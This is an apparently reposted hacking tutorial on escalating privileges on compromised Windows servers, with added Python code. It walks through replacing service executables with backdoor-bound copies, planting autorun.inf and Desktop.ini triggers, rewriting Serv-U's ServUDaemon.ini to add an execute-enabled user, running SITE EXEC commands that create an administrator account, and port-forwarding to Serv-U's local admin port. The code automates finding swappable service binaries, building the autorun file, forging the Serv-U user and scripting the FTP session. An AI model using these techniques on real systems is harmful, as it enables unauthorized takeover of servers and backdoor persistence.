Privilege escalation

xiaoxiao2021-03-06  102

Replace a service executable.

This is a trick most hackers never tire of. Windows will not let you overwrite a running program's file, but it does let you rename it, so we can swap a service's executable for our own and have our backdoor or Trojan run automatically after the next reboot. First, in the shell you have obtained, run the net start command to see which services are running. If you know the Windows system services well you will quickly see which ones can be used.

C:\WINNT\System32\>net start
These Windows services are started:

   COM+ Event System
   Cryptographic Services
   DHCP Client
   Distributed Link Tracking Client
   DNS Client
   Event Log
   Help and Support
   IPSEC Services
   Logical Disk Manager
   Logical Disk Manager Administrative Service
   Network Connections
   Network Location Awareness (NLA)
   Protected Storage
   Remote Procedure Call (RPC)
   Rising Process Communication Center
   Rising Realtime Monitor Service
   Secondary Logon
   Security Accounts Manager
   Shell Hardware Detection
   System Event Notification
   System Restore Service
   Telephony
   Themes
   Upload Manager
   WebClient
   Windows Audio
   Windows Image Acquisition (WIA)
   Windows Management Instrumentation
   Windows Time
   Wireless Zero Configuration
   Workstation

The command completed successfully.

I ran the command on my own machine for this demonstration (so that nobody else gets hacked). Note the two Rising entries: that is the Rising antivirus I have installed. The Rising Process Communication Center service runs CCenter.exe and the Rising Realtime Monitor Service runs RavMond.exe. Both are third-party services, and those are the ones to use. (I strongly recommend replacing a third-party service rather than a system service; tampering with system services makes the system unstable.) So we look for those two files and find them in D:\Rising\RAV\. One thing to watch: if the file sits under Program Files on the system drive, we need to know whether the target's disk is NTFS. On NTFS the Program Files folder is not writable by the Guest account by default, and neither are the Windows directory and Documents and Settings, so we cannot replace a file there and have to find another way. (This is another reason I do not recommend replacing system services: their files live in Windows\System32, which is not writable.) If the disk is FAT32 there is nothing to worry about, because FAT32 has no permissions at all and every folder is writable.
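As an added example (my code, not the article's), here is the survey above done in Python instead of by eye. The article uses net start, which only shows display names; this script instead takes the output of `wmic service get Name,PathName /format:list`, which also gives each service's image path, strips the arguments from that path, and lists the services whose executable is outside the three protected trees. The wmic output, the service short names and the system root C:\WINNT are constructed or assumed; only the two Rising paths come from the article.

```python
import re

# Assumed system root: C:\WINNT on Windows 2000, C:\Windows on XP.
SYSTEM_ROOT = r"C:\WINNT"

# The three trees the article says are not writable by Guest/Everyone on a
# default NTFS install; everything else on the disk is treated as fair game.
PROTECTED_DIRS = (
    SYSTEM_ROOT,
    r"C:\Program Files",
    r"C:\Documents and Settings",
)

# Constructed sample in the shape of
#   wmic service get Name,PathName /format:list
# Service short names are made up; the Rising paths follow the article.
SAMPLE_WMIC_LIST = r"""

Name=Eventlog
PathName=%SystemRoot%\system32\services.exe


Name=RpcSs
PathName=%SystemRoot%\system32\svchost.exe -k rpcss


Name=RsCCenter
PathName=D:\Rising\RAV\CCenter.exe


Name=RsRavMon
PathName="D:\Rising\RAV\RavMond.exe" -service


Name=Serv-U
PathName="C:\Program Files\Serv-U\ServUDaemon.exe"


Name=Helper
PathName=C:\Tools\Helper Svc\helper.exe /run

"""


def image_path(pathname):
    """Strip arguments from a service PathName and expand %SystemRoot%.

    A quoted path ends at the closing quote; an unquoted one ends at the
    first token ending in .exe, so unquoted paths with spaces survive.
    """
    p = pathname.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        exe = p[1:end] if end > 0 else p[1:]
    else:
        m = re.match(r"(.*?\.exe)(?:\s|$)", p, re.IGNORECASE)
        exe = m.group(1) if m else (p.split() or [""])[0]
    # lambda replacement so the backslashes in SYSTEM_ROOT are taken literally
    return re.sub(r"%systemroot%", lambda _: SYSTEM_ROOT, exe, flags=re.IGNORECASE)


def is_protected(exe):
    """True if the image sits under one of the protected trees."""
    e = exe.lower()
    return any(e.startswith(d.lower() + "\\") for d in PROTECTED_DIRS)


def parse_wmic_list(text):
    """Parse /format:list output (blank-line separated Key=Value records)."""
    records, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition("=")
        current[key] = value
    if current:
        records.append(current)
    return records


def candidate_services(text):
    """(name, image) for every service whose image is in a writable tree."""
    out = []
    for rec in parse_wmic_list(text):
        if "PathName" not in rec:
            continue
        exe = image_path(rec["PathName"])
        if not is_protected(exe):
            out.append((rec["Name"], exe))
    return out


if __name__ == "__main__":
    for name, exe in candidate_services(SAMPLE_WMIC_LIST):
        print(f"{name:12} {exe}")
```

On the sample the two Rising services and the made-up Helper service are reported; the Serv-U service is skipped because it lives under Program Files, and the system services because they resolve under the system root. The same check, run from the defender's side, is a quick way to find service binaries that an unprivileged user could swap.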

So someone will ask: if the disk is NTFS, are we out of luck?

Of course not. By default on NTFS, apart from those three folders, every other folder and the rest of the partition is Everyone: Full Control. (In other words, even over an anonymous IPC$ connection, wherever you have any write access at all you can write to these locations.) So as long as the target's third-party service is not installed under one of those three folders, we can replace it. I download CCenter.exe to my own machine (over FTP, or by putting it in the IIS web root and fetching it, and so on), then use a file binder to bundle it with my favourite backdoor. After binding, upload it: first rename the target's CCenter.exe to cCentBak.exe, then put our own file in its place as CCenter.exe. Now we just wait for the other machine to reboot and our backdoor runs. Since Windows is not very stable, the host will usually reboot within a week. (If you cannot wait, you could DDoS the server to force a reboot, but I do not approve of that.) When the backdoor comes up it runs with SYSTEM privileges!

5, Replace a program the admin uses often.

If the target has no service you can use, replace a program the administrator uses often, such as QQ or MSN.

6, Using autorun.inf or desktop.ini.

You have surely seen this: put a CD in the drive and a Flash animation pops up by itself. Why? Look in the root directory of the CD: is there an autorun.inf file? Open it in Notepad and you will find something like this:

   [autorun]
   open=xxx.exe

(The key is open=, not autorun=.) That is the program you just saw start automatically.

So we can use this to raise our privileges. First configure a backdoor (I usually use Winshell, but you need not), upload it into any folder on the target's D: drive, then take the autorun.inf from your own CD, change the xxx.exe after open= to the name of your backdoor file, upload it to the root of D:, and set the read-only, system and hidden attributes on it. Then wait for the admin to browse D:, and our backdoor starts. (Of course this only works if AutoRun has not been disabled on that machine.)
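Added example, not part of the original article: a small Python model of what this trick depends on. It writes the autorun.inf described above with the correct open= key, reads back the command a given autorun.inf would launch (with the autorun= spelling rejected, as Windows rejects it), and applies the NoDriveTypeAutoRun policy bitmask, the registry value behind the "unless AutoRun is disabled" caveat, to decide whether opening a fixed drive would run it. The drive-type numbers are the documented GetDriveType values; bit n of the mask disables AutoRun for drive type n, and 0x91 is the Windows XP default.

```python
# GetDriveType() values. Bit n of the NoDriveTypeAutoRun policy value
# (HKCU or HKLM ...\Policies\Explorer) disables AutoRun for drive type n.
DRIVE_TYPE = {
    "unknown": 0, "no_root_dir": 1, "removable": 2, "fixed": 3,
    "remote": 4, "cdrom": 5, "ramdisk": 6,
}
XP_DEFAULT_MASK = 0x91    # unknown, remote and reserved bit 7 disabled
ALL_DISABLED_MASK = 0xFF  # what a hardened box sets


def build_autorun_inf(exe_name):
    """The autorun.inf the article describes, with the correct open= key."""
    return "[autorun]\r\n" + f"open={exe_name}\r\n"


def autorun_command(inf_text):
    """Return the command an autorun.inf would launch, or None.

    Section and key names are matched case-insensitively; both open= and
    shellexecute= are honoured. A bare autorun= key (the article's wording)
    is ignored, just as Windows ignores it.
    """
    in_section = False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() in ("open", "shellexecute"):
                return value.strip()
    return None


def autorun_enabled(mask, drive_type):
    """True if the policy mask still allows AutoRun for this drive type."""
    return not (mask >> DRIVE_TYPE[drive_type]) & 1


def would_launch(inf_text, drive_type, mask=XP_DEFAULT_MASK):
    """Command that runs when the drive is opened in Explorer, or None."""
    cmd = autorun_command(inf_text)
    return cmd if cmd and autorun_enabled(mask, drive_type) else None


if __name__ == "__main__":
    inf = build_autorun_inf("backdoor.exe")
    for dt in ("fixed", "cdrom", "removable", "remote"):
        print(f"{dt:10} default mask -> {would_launch(inf, dt)}")
        print(f"{dt:10} 0xFF         -> {would_launch(inf, dt, ALL_DISABLED_MASK)}")
```

With the XP default mask, fixed, CD-ROM and removable drives all pass, which is why planting the file on D: works on the machines the article has in mind; a mask of 0xFF blocks every drive type. Note that since Microsoft's 2011 AutoRun change, autorun.inf on hard disks and USB sticks is ignored altogether and only optical media are honoured, so the trick is specific to the era the article describes.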

Desktop.ini plays the same role. Everyone knows Windows lets you customize a folder; this is implemented by writing specific files into the folder, Desktop.ini and Folder.htt, and we can use modified versions of those files to achieve our goal.

First create a folder locally (the name does not matter), open it, right-click on an empty spot and choose "Customize This Folder" (this seems not to work on XP), and follow the wizard to the end. When it finishes you will see two extra items in the directory, a Folder Settings directory and a Desktop.ini file (if you cannot see them, turn off "Hide protected operating system files"). In the Folder Settings directory find Folder.htt, open it in Notepad and add the following code anywhere:

Then put your backdoor file in the Folder Settings directory, upload that directory together with Desktop.ini into any directory on the target, and as soon as the administrator browses that directory our backdoor runs. (If you want to be safe, plant it in a few more directories.)

7, Serv-U privilege escalation

There are three ways to escalate privileges with Serv-U. The first is the overflow, which I have covered before and will not repeat here. What I want to talk about are the other two.

Method 1: Requirement: full control over the Serv-U installation directory.

Method: go into the target's Serv-U directory and look at ServUDaemon.ini, the Serv-U configuration file. Unless the administrator chose to store all of Serv-U's configuration in the registry, this file gives us everything: version, IP addresses, even the Serv-U user names and passwords. Early versions stored the password in clear text; later ones store an MD5 hash, so you cannot read the password directly. We still have a way, though: install Serv-U locally (preferably a recent version), overwrite your own ServUDaemon.ini with the one downloaded from the target and restart Serv-U, so that your configuration is now identical to his. Create a new user (the group does not matter); what matters is to set its home directory to the target's system drive and to grant it Execute permission. This is the crucial step. Apply the change and exit. Upload your modified ServUDaemon.ini over his, wait for his Serv-U to restart and reload the configuration, and then log in to his FTP. Once in, run the following commands:

   cd Windows
   cd System32
   quote site exec net.exe user WOFEIWO /add
   quote site exec net.exe localgroup Administrators WOFEIWO /add
   bye

Now you have an administrator account called WOFEIWO. What are you waiting for? Log in over 3389; I need not say more!
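Method 1 edits ServUDaemon.ini through a local copy of Serv-U. The following added example (my code, not the article's) does the same edit directly in Python: it parses the [USER=...] sections, appends a user whose home directory is the system drive with the execute flag set, checks which users could issue SITE EXEC, and wraps the FTP session above in ftplib. The ini fragment is constructed, and the password layout (two salt characters followed by the upper-case MD5 of salt plus password) and the section and key names are assumptions from my memory of Serv-U 5/6, not something the article states; compare them against the target's own file before relying on them.

```python
import hashlib
import re
import secrets
import string

# ASSUMED password layout for Serv-U 5/6 ServUDaemon.ini (from memory of the
# format, not from the article): two random salt characters followed by the
# upper-case hex MD5 of salt + password. Earlier versions stored clear text.
_SALT_CHARS = string.ascii_letters + string.digits


def servu_hash(password, salt=None):
    """Return the Password= value for a plaintext password."""
    if salt is None:
        salt = "".join(secrets.choice(_SALT_CHARS) for _ in range(2))
    if len(salt) != 2:
        raise ValueError("Serv-U salt is exactly two characters")
    digest = hashlib.md5((salt + password).encode("latin-1")).hexdigest()
    return salt + digest.upper()


def servu_verify(stored, candidate):
    """Check a candidate password against a stored Password= value."""
    return len(stored) == 34 and servu_hash(candidate, stored[:2]) == stored


# Constructed ServUDaemon.ini fragment, not a real capture. Section and key
# names follow the Serv-U 5/6 layout as I remember it (also an assumption).
SAMPLE_INI = (
    "[GLOBAL]\r\n"
    "Version=5.0.0.4\r\n"
    "\r\n"
    "[USER=webmaster|1]\r\n"
    "Password=" + servu_hash("letmein", "ab") + "\r\n"
    "HomeDir=D:\\wwwroot\r\n"
    "RelPaths=1\r\n"
    "Access1=D:\\wwwroot,RWAMLCP\r\n"   # no E flag: this user cannot SITE EXEC
)

_USER_HEADER = re.compile(r"^\[USER=([^|\]]+)\|(\d+)\]$")


def users(ini_text):
    """Map user name -> {key: value} for every [USER=name|n] section."""
    result, current = {}, None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            m = _USER_HEADER.match(line)
            current = result.setdefault(m.group(1), {}) if m else None
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            current[key] = value
    return result


def can_site_exec(ini_text, name):
    """True if the user holds the E (execute) flag on some path."""
    fields = users(ini_text).get(name, {})
    return any(k.startswith("Access") and "E" in v.rsplit(",", 1)[-1]
               for k, v in fields.items())


def add_user(ini_text, name, password, home_dir="C:\\"):
    """Append the user the article creates through the GUI: home on the
    system drive, full rights including execute, so SITE EXEC is allowed."""
    if name in users(ini_text):
        raise ValueError(f"user {name!r} already exists")
    section = [
        f"[USER={name}|1]",
        "Password=" + servu_hash(password),
        f"HomeDir={home_dir}",
        "RelPaths=1",
        f"Access1={home_dir},RWAMELCDP",   # E = execute
    ]
    return ini_text.rstrip("\r\n") + "\r\n\r\n" + "\r\n".join(section) + "\r\n"


def add_admin_via_site_exec(host, ftp_user, ftp_pass, new_admin, port=21):
    """Replay the article's FTP session once the modified ini is live.
    Not exercised offline; Serv-U honours SITE EXEC only for users with E."""
    import ftplib
    ftp = ftplib.FTP()
    ftp.connect(host, port, timeout=15)
    ftp.login(ftp_user, ftp_pass)
    ftp.cwd("Windows/System32")
    replies = [
        ftp.sendcmd(f"SITE EXEC net.exe user {new_admin} /add"),
        ftp.sendcmd(f"SITE EXEC net.exe localgroup Administrators {new_admin} /add"),
    ]
    ftp.quit()
    return replies


if __name__ == "__main__":
    new_ini = add_user(SAMPLE_INI, "WOFEIWO", "s3cret")
    print(new_ini)
    print("WOFEIWO can SITE EXEC:", can_site_exec(new_ini, "WOFEIWO"))
```

servu_verify is the same function a defender would use to test an ini file's accounts against a wordlist, since the salt is stored in clear in front of the hash; and can_site_exec is the audit that matters here: any account with both a home directory on the system drive and the E flag is one SITE EXEC away from a local administrator.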

Method 2: Serv-U opens two ports: 21, which is FTP, and 43958. What is that one? It is Serv-U's local administration port. By default it accepts connections only from 127.0.0.1. That is where fpipe.exe comes in: it is a port forwarder. Upload it and run:

   fpipe -v -l 3333 -r 43958 127.0.0.1

This maps port 3333 on the target to port 43958 on 127.0.0.1, so the administration port, which only listens on loopback, can now be reached from outside through port 3333.

Please cite the original address when reposting: https://www.9cbs.com/read-99475.html
